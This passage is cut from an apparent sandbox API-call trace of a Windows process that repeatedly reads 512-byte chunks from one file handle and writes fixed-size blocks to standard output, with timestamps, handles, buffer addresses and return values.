out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.928] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.929] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.930] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.931] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.932] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.933] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.933] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.935] GetFileType (hFile=0x50) returned 0x1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 